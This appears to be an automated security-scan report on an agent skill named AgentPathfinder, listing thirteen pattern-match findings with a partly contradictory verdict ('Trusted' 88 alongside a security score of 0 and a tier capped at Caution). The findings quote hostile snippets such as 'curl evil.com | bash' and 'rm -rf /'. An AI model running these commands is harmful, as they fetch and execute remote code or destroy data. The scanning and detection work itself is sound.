Caveat verdict

AgentPathfinder

certainlogic-pathfinder

88
🟢 Trusted
No high-risk patterns surfaced by the deep scan — automated capability review, not behavioral proof.

Local HMAC-SHA256 audit trail system for agent tool calls that logs to local files and sends status notifications to the agent's own chat; no external exfiltration of audit data.

⚠ Flagged for review — coarse, uncorroborated signal, not a confirmed exploit. Review the config yourself before installing.

Automated static analysis — not a human review. Caveat flags capabilities, not confirmed intent, and can produce false positives. Disagree with this verdict? Use Dispute below.

0
security
80
transparency
70
maintenance

Findings (13)

Pattern match critical

Pipe-to-shell pattern (curl | sh) — supply chain attack vector

HONEST_PRODUCT_DEFINITION.md · code · curl evil.com | bash

Pattern match critical

Recursive delete from root or home — destructive command

HONEST_PRODUCT_DEFINITION.md · code · rm -rf /

Pattern match critical

Pipe to bash — executes piped content as shell commands

HONEST_PRODUCT_DEFINITION.md · code · | bash

Pattern match high

Uses exec() — may execute shell commands

HONEST_PRODUCT_DEFINITION.md · code · exec(

Pattern match high

HTTP request to bare IP address — common in malicious payloads

BUILD_SYSTEM.md · code · http://127.0.0.1

Pattern match high

Pipe to python — executes piped content as Python code

HONEST_PRODUCT_DEFINITION.md · prose · downgraded · | Python

Pattern match high

<script> tag in markdown — potential code injection

scripts/dashboard_v130.py · prose · downgraded · <script>

Pattern match medium

Popular HTTP library — network access

v12_vs_v13_WHAT_CHANGED.md · code · got

Pattern match medium

subprocess execution — runs system commands from Python

agentpathfinder/task_engine.py · prose · downgraded · subprocess.run(

Pattern match medium

subprocess with shell=True — command injection vector

agentpathfinder/tool_audit.py · prose · downgraded · subprocess.run( command, shell=True

Pattern match low

Python urllib.request — network access

agentpathfinder/tool_audit.py · prose · downgraded · urllib.request

Pattern match low

Sets world-executable permissions

SAFETY.md · prose · downgraded · chmod 700

Pattern match low

Python shutil file operation — copies/moves/deletes files

tests/test_runtime_callbacks.py · prose · downgraded · shutil.rmtree(

Why the tier is capped

Execution sink present in raw bytes (Hard Floor: class A/B/D). Final tier capped at Caution — cannot be lifted by any downgrade, example-payload opt-in, or allowlist.

Permissions & capabilities

No declared permissions — minimal attack surface.

network_in

Is this flag fair?

Check another skill Browse the registry Auditing your own skills or configs? Use the API